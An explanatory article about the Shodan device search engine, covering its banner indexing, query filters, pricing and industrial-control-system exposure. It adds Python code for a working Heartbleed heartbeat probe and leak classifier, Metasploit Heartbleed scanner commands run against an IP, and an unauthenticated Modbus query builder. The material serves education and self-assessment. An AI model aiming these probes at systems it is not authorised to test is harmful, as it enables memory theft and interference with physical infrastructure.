Shodan is widely known as “The World’s First Search Engine for Internet-connected Devices.” We should probably call it the “World’s Most Dangerous Search Engine.” In the following analysis we explain why.
Shodan.io is a website that continuously scans the public IPv4 address space and catalogues whatever device or software it finds answering. Users can then pull up, for example, a list of Apache servers worldwide, or the subset of them that are still vulnerable to the Heartbleed bug.
It works by connecting to well-known ports and speaking the expected protocol (HTTP, HTTPS, telnet, SSL/TLS, NTP and many others), then copying the text of the response, the service banner, into its searchable database. On top of the banner it runs a small number of non-intrusive checks of its own, for example to flag servers that are vulnerable to Heartbleed or whose banner advertises default credentials.
For example, below is the kind of HTTP response header a web server returns when someone opens a page. As the Server header shows, the server volunteers information about itself (product and often version) before any page content is sent.
Shodan indexes these banners so that anyone can search for phrases such as “MongoDB”, “apache” or “default password”. It also completes TLS handshakes to record certificates and cipher suites, and performs a few targeted checks (the Heartbleed test being the best known) rather than full exploitation.
Shodan looks like the perfect tool for attackers: a search engine for devices that can be exploited. Of course, the promotional description on its website does not name attackers as an audience; like Metasploit, it is positioned purely as a penetration-testing aid. Nor does it warn users that finding a vulnerable server is one thing, but attempting to log in to it without authorization is against the law. Instead, it boasts that 56% of Fortune 100 companies, as well as 1,000 universities, use it.
The basic version is free, but full access costs $49. The free version caps the number of results shown at 50. The paid version adds the map view, downloading of search results as JSON, real-time data streaming and more. API use consumes query credits. There is also an enterprise license. The instructions are not on the web, but the manual can be bought for as little as $1, or for the suggested price of $5.
How Shodan Works and How to Use It
You can run Shodan searches on the website, through its Python command-line client, or via its API. Many filters are available, such as port, country and more.
The documentation lists the fields it captures, including the IP address, the list of Elasticsearch peers, the website’s robots.txt file, device location, SSH ciphers, etc. These come from the protocol responses it collects, not only from HTTP. Below is the first screen of a result.
Shodan’s access is not limited to web servers. It claims to be able to scan for printers, cameras, IoT devices, routers and specific databases.
To run a query, you can simply type free text and Shodan returns the devices whose banner contains that text, or you can use filters of the form filter:value. Among the available filters are country, geo (latitude and longitude), hostname, ip, net (a range of IPs in CIDR notation), os and vuln (a specific CVE ID).
Users can save queries for others to use. For example, here is one that shows VNC servers with authentication disabled: port:"5900" authentication disabled. VNC is a remote-desktop protocol. But a banner that says “authentication disabled” does not guarantee that the server is truly open: click on a few of the results and a login screen still pops up, because the banner only reflects the VNC handshake as Shodan saw it at scan time, not what sits behind it.
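As an added example (not from the original article and not Shodan's own code), the following Python parses the two server messages of an RFB handshake that a banner like the one above summarises: the ProtocolVersion string and the security-type list. Security type 1 ("None") is what Shodan reports as authentication disabled. The sample messages are constructed by hand so the script runs offline; the refusal reason string and the sample security-type lists are assumptions made for the example.

```python
"""Parse the server side of a VNC (RFB) handshake to see what authentication
it really offers.  Added example, not from the article or from Shodan.

Shodan reports "Authentication disabled" when the server lists security type 1
("None").  The sample messages below are constructed so the script runs offline.
"""
import struct

# Security types registered for RFB 3.7/3.8; anything else is a vendor extension.
SECURITY_TYPES = {
    1: "None",
    2: "VNC Authentication",
    5: "RA2",
    6: "RA2ne",
    16: "Tight",
    17: "Ultra",
    18: "TLS",
    19: "VeNCrypt",
    30: "Apple Remote Desktop",
}


def parse_rfb_version(data):
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n'."""
    if len(data) < 12 or data[:4] != b"RFB " or data[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    return int(data[4:7]), int(data[8:11])


def _reason(data):
    """Failure reason: U32 length followed by a reason string."""
    (length,) = struct.unpack(">I", data[:4])
    return data[4:4 + length].decode("latin-1", "replace")


def parse_security_types(data, version):
    """Return the list of security types the server offers.

    RFB 3.3: a single U32 security type (0 = failure, followed by a reason).
    RFB 3.7+: U8 count followed by that many U8 types (count 0 = failure,
    followed by a reason).
    """
    if version < (3, 7):
        (sectype,) = struct.unpack(">I", data[:4])
        if sectype == 0:
            raise ConnectionError("server refused: " + _reason(data[4:]))
        return [sectype]
    count = data[0]
    if count == 0:
        raise ConnectionError("server refused: " + _reason(data[1:]))
    types = list(data[1:1 + count])
    if len(types) != count:
        raise ValueError("truncated security-type list")
    return types


def describe(version_msg, sectype_msg):
    """Summarise the handshake the way a Shodan VNC banner does."""
    version = parse_rfb_version(version_msg)
    types = parse_security_types(sectype_msg, version)
    return {
        "version": "%d.%d" % version,
        "security_types": [SECURITY_TYPES.get(t, "unknown(%d)" % t) for t in types],
        # "Authentication disabled" only means the RFB layer wants no password;
        # the desktop behind it may still show an OS lock screen, which is why
        # clicking through some of these results still yields a login prompt.
        "authentication_disabled": 1 in types,
    }


if __name__ == "__main__":
    # Constructed sample handshakes (not captured from real hosts).
    open_server = (b"RFB 003.008\n", b"\x01\x01")          # offers None only
    locked_server = (b"RFB 003.008\n", b"\x02\x02\x13")    # VNC auth or VeNCrypt
    legacy_open = (b"RFB 003.003\n", b"\x00\x00\x00\x01")  # RFB 3.3, type None
    for v, s in (open_server, locked_server, legacy_open):
        print(describe(v, s))
    refused = b"\x00" + struct.pack(">I", 4) + b"busy"
    try:
        describe(b"RFB 003.008\n", refused)
    except ConnectionError as exc:
        print(exc)
```

Fed the bytes read from a live socket after sending your own ProtocolVersion reply, describe() gives the same verdict the banner does, which makes it a quick way to re-check a saved query's hits before drawing conclusions from them.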
Searching for vulnerabilities is a little different. For example, let’s search for the Heartbleed bug, vuln:CVE-2014-0160.
This example is in the Shodan manual. As you can see, the server is flagged as vulnerable to Heartbleed. Shodan cannot read that from the banner; it has to send a test heartbeat to find out.
We can verify the finding by running Metasploit’s openssl_heartbleed scanner module against the host. As you can see, the server returns a chunk of its memory.
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set RHOSTS 22.214.171.124
RHOSTS => 22.214.171.124
msf auxiliary(openssl_heartbleed) > set VERBOSE true
VERBOSE => true
msf auxiliary(openssl_heartbleed) > run
[*] 22.214.171.124:443 - Sending Heartbeat...
[*] 22.214.171.124:443 - Heartbeat response, 65535 bytes
[+] 22.214.171.124:443 - Heartbeat response with leak
[*] 22.214.171.124:443 - Printable info leaked:
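The check that module performs can be reproduced in a few lines. The Python below is an added example, not code from the article, Shodan or Metasploit: it builds a heartbeat request whose declared payload_length is larger than the payload actually sent (RFC 6520) and classifies the reply, counting every returned byte beyond what was sent as leaked memory. Because it runs offline it also contains two constructed stand-ins for a server, one that trusts the declared length and one that discards the malformed request as a patched OpenSSL does. The fake heap contents are invented sample data, and the TLS handshake that precedes a real probe is omitted.

```python
"""Heartbleed (CVE-2014-0160) check, reduced to the heartbeat exchange.
Added example; not code from the article, Shodan or Metasploit.

A heartbeat request (RFC 6520) carries a declared payload_length.  Unpatched
OpenSSL copied that many bytes out of memory without checking that the record
really was that long.  The two *_server functions are constructed stand-ins so
everything runs offline; the handshake is omitted and FAKE_HEAP is invented.
"""
import struct

TLS_ALERT = 0x15
TLS_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_VERSION = 0x0302      # record-layer version used by the classic probe
PADDING = b"\x00" * 16    # RFC 6520 requires at least 16 bytes of padding


def tls_record(content_type, body, version=TLS_VERSION):
    """Wrap a body in a TLS record header: type(1) version(2) length(2)."""
    return struct.pack(">BHH", content_type, version, len(body)) + body


def parse_tls_record(data):
    """Split one TLS record off the front of data."""
    if len(data) < 5:
        raise ValueError("short TLS record header")
    content_type, version, length = struct.unpack(">BHH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("truncated TLS record")
    return content_type, version, body, data[5 + length:]


def heartbeat_request(payload, claimed_len):
    """Build a heartbeat request; the bug triggers when claimed_len > len(payload)."""
    body = struct.pack(">BH", HB_REQUEST, claimed_len) + payload + PADDING
    return tls_record(TLS_HEARTBEAT, body)


def analyse_response(data, sent_payload):
    """Classify a server's reply to heartbeat_request().

    A compliant server silently discards a request whose payload_length does
    not fit in the record, so with the oversized probe any heartbeat response
    is a finding, and every byte beyond the payload we sent is leaked memory.
    """
    if not data:
        return {"status": "no_response", "leaked": 0, "leak": b""}
    content_type, _version, body, _rest = parse_tls_record(data)
    if content_type == TLS_ALERT:
        return {"status": "alert", "leaked": 0, "leak": b""}
    if content_type != TLS_HEARTBEAT:
        return {"status": "other", "leaked": 0, "leak": b""}
    hb_type, declared = struct.unpack(">BH", body[:3])
    if hb_type != HB_RESPONSE:
        raise ValueError("not a heartbeat response")
    payload = body[3:3 + declared]
    leak = payload[len(sent_payload):]
    return {"status": "vulnerable" if leak else "echo", "leaked": len(leak), "leak": leak}


def printable(leak):
    """Render leaked bytes like 'Printable info leaked:' does: ASCII, '.' elsewhere."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in leak)


# --- constructed stand-ins for a server, used only for the offline demonstration ---
FAKE_HEAP = (b"GET /login HTTP/1.1\r\nCookie: session=9f2c4e1d\r\n"
             b"Authorization: Basic YWRtaW46aHVudGVyMg==\r\n")


def vulnerable_server(request):
    """Unpatched behaviour: trust the declared length and copy that many bytes."""
    _ct, version, body, _ = parse_tls_record(request)
    _hb_type, declared = struct.unpack(">BH", body[:3])
    memory = body[3:] + FAKE_HEAP          # the copy runs on into adjacent memory
    chunk = memory[:declared].ljust(declared, b"\x00")
    return tls_record(TLS_HEARTBEAT, struct.pack(">BH", HB_RESPONSE, declared) + chunk + PADDING, version)


def patched_server(request):
    """Patched behaviour: discard any request whose payload_length does not fit."""
    _ct, version, body, _ = parse_tls_record(request)
    _hb_type, declared = struct.unpack(">BH", body[:3])
    if 3 + declared + 16 > len(body):
        return b""
    payload = body[3:3 + declared]
    return tls_record(TLS_HEARTBEAT, struct.pack(">BH", HB_RESPONSE, declared) + payload + PADDING, version)


if __name__ == "__main__":
    probe = heartbeat_request(b"probe", claimed_len=0x40)
    for name, server in (("vulnerable", vulnerable_server), ("patched", patched_server)):
        result = analyse_response(server(probe), b"probe")
        print(name, result["status"], result["leaked"], "bytes:", printable(result["leak"]))
```

Against a real host the same analyse_response() would be applied to the record read back after a completed handshake; the point to notice is that the classification needs no signature, only the mismatch between what was sent and what came back, which is why Shodan can tag hosts with vuln:CVE-2014-0160 without exploiting them any further.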
Shodan does not only vacuum up metadata; it also takes screenshots as it crawls. You can search its image collection for VPN, Windows and other login screens, as well as screenshots from services that let it in without asking for any credentials.
There are Shodan plugins for Chrome and Firefox. Shodan can also be added to Maltego, a link-analysis tool for open-source intelligence that lets you explore data visually. Doing that adds the Exploit object to Maltego, plus new commands such as Search Shodan and Search Exploits.
The Shodan API has client libraries in many languages, including Python, Ruby, PHP, C#, Go, Haskell, Java and others.
Below we search for NGINX web servers in Chile and list their versions. As you can see, not all fields are present for every result.
import shodan

api = shodan.Shodan("(obfuscated)")  # your API key; the article obfuscates it
query = "product:nginx country:CL"   # nginx servers in Chile, as described above
result = api.search(query)
for r in result["matches"]:
    # Not every banner yields a parsed product or version, so use .get()
    print("product=" + str(r.get("product")) + " version=" + str(r.get("version")))
Industrial Control Systems
The user manual has a whole section on how to query industrial control systems (ICS), the PLCs and SCADA components that control physical machinery, by the protocols they speak, such as Modbus, Siemens S7 and DNP3. Many of these protocols were designed for isolated networks and have no authentication at all: anyone who can reach the port can read from, and often write to, the device.
On the left, Shodan lists some industrial devices. The minus (-) prefix means ‘not’. Here we exclude the web servers and SSH daemons that happen to sit on the ports Shodan associates with control devices, so that only genuine control-system services remain.
You can use Shodan for penetration testing of your own public-facing IPs. It cannot see internal networks: it only indexes what answers from the public internet.
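To make the “no authentication” point concrete, here is an added example in Python (not from the article, the Shodan manual or any vendor): it builds the Modbus/TCP Read Device Identification request (function code 0x2B, MEI type 0x0E) that banner grabbers use to fingerprint a PLC, and parses the reply. Nothing in the frame identifies or authenticates the client. The sample reply, its vendor and product strings and the unit identifier are constructed for the example.

```python
"""Modbus/TCP Read Device Identification, the query used to fingerprint PLCs.
Added example; not from the article, the Shodan manual or any vendor.

Nothing in the frame identifies or authenticates the client: whoever reaches
TCP port 502 can ask, and can read and write registers the same way.  The
replies below are constructed (vendor, product and unit id are invented) so
the script runs offline.
"""
import struct

MODBUS_PORT = 502                  # default port, one of those Shodan scans
FC_ENCAPSULATED_INTERFACE = 0x2B   # function code 43
MEI_READ_DEVICE_ID = 0x0E          # MEI type 14
EXCEPTION_FLAG = 0x80
OBJECT_NAMES = {0: "VendorName", 1: "ProductCode", 2: "MajorMinorRevision",
                3: "VendorUrl", 4: "ProductName", 5: "ModelName",
                6: "UserApplicationName"}


def mbap(transaction_id, unit_id, pdu):
    """MBAP header: transaction id, protocol id 0 (Modbus), length of unit id + PDU, unit id."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def read_device_id_request(transaction_id=1, unit_id=0xFF, read_code=0x01, object_id=0x00):
    """Read Device Identification: read_code 1 = basic objects (vendor, product, revision)."""
    pdu = struct.pack(">BBBB", FC_ENCAPSULATED_INTERFACE, MEI_READ_DEVICE_ID, read_code, object_id)
    return mbap(transaction_id, unit_id, pdu)


def parse_response(frame, expected_tid):
    """Parse a Read Device Identification reply or a Modbus exception."""
    if len(frame) < 8:
        raise ValueError("short Modbus frame")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or tid != expected_tid:
        raise ValueError("not the reply to our request")
    pdu = frame[7:7 + length - 1]
    if len(pdu) != length - 1:
        raise ValueError("truncated PDU")
    fc = pdu[0]
    if fc == FC_ENCAPSULATED_INTERFACE | EXCEPTION_FLAG:
        # Device speaks Modbus but rejected the query (e.g. 0x01 illegal function).
        return {"unit_id": unit, "exception": pdu[1], "objects": {}}
    if fc != FC_ENCAPSULATED_INTERFACE or pdu[1] != MEI_READ_DEVICE_ID:
        raise ValueError("unexpected function code or MEI type")
    _read_code, conformity, more_follows, _next_id, count = struct.unpack(">BBBBB", pdu[2:7])
    objects, pos = {}, 7
    for _ in range(count):
        oid, olen = pdu[pos], pdu[pos + 1]
        value = pdu[pos + 2:pos + 2 + olen]
        objects[OBJECT_NAMES.get(oid, "object_%d" % oid)] = value.decode("latin-1")
        pos += 2 + olen
    return {"unit_id": unit, "exception": None, "conformity_level": conformity,
            "more_follows": bool(more_follows), "objects": objects}


def sample_identification_response(transaction_id, unit_id=0xFF):
    """Constructed reply a PLC might send; the strings are invented for the example."""
    objects = [(0, b"Acme Controls"), (1, b"PLC-100"), (2, b"v2.4")]
    body = struct.pack(">BBBBBBB", FC_ENCAPSULATED_INTERFACE, MEI_READ_DEVICE_ID,
                       0x01, 0x01, 0x00, 0x00, len(objects))
    for oid, value in objects:
        body += struct.pack(">BB", oid, len(value)) + value
    return mbap(transaction_id, unit_id, body)


def sample_exception_response(transaction_id, unit_id=0xFF):
    """Constructed exception reply: function not supported on this unit."""
    return mbap(transaction_id, unit_id, struct.pack(">BB", FC_ENCAPSULATED_INTERFACE | EXCEPTION_FLAG, 0x01))


if __name__ == "__main__":
    request = read_device_id_request(transaction_id=7)
    print("request:", request.hex())   # no credentials anywhere in these 11 bytes
    print(parse_response(sample_identification_response(7), 7))
    print(parse_response(sample_exception_response(7), 7))
```

An exception reply is still a finding: the device answered on port 502, which is all the attacker in the article's scenario needs to know before moving on to register reads and writes with the same unauthenticated frames.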
John Matherly released Shodan in 2009 after playing with the basic idea since he was a teenager. The name comes from SHODAN, the rogue artificial intelligence in the System Shock video games whose goal is to eradicate humanity. The system has surged in popularity, and a glance at the online tutorials and overviews shows that a single search already returns hundreds of thousands or even millions of results.
Shodan has gained the media’s attention too. Forbes wrote about it in 2013, calling it a “terrifying search engine” that can flush out baby monitors and traffic lights. When the reporter sat down with a security researcher, he watched data streaming from a giant Caterpillar mining truck and a live camera feed of a company’s warehouse. Many of these devices had no user ID or password at all, or still had default or easily guessed ones.
The Washington Post wrote about Shodan under the headline “Cyber search engine Shodan exposes industrial control systems to new risks”. According to the article, soon after putting the tool online its developers “quickly realized they were revealing an astonishing fact: uncounted numbers of industrial control computers, e.g. systems that automate such things as water plants and power grids, were linked in and, in some cases, were wide open to exploitation by even moderately talented hackers.” The article also raised awareness of the problem, reporting that six researchers from Digital Bond studied six random SCADA control systems (the kind used to open and close valves and the like) and found they “were riddled with hardware and software flaws.” With Shodan freely available, industrial facilities, power plants and municipalities often do not know how exposed they are.
On the flip side, a few years ago Citizen Lab used Shodan to find Blue Coat filtering and surveillance appliances operating in Iran, Syria and Sudan, countries covered by US export sanctions.
Veteran hackers already know about Nmap, Metasploit and Shodan. It is the newcomers who will find it hard to resist the urge to log in to the devices they find and run exploits against them. A company, however, can use the same tool for its own penetration testing. It may already know about its web server with ports 80 and 636 exposed, and about its servers running SSH, but it would be wise to run Shodan against every public-facing IP address it owns to uncover unsecured routers, cameras and industrial equipment.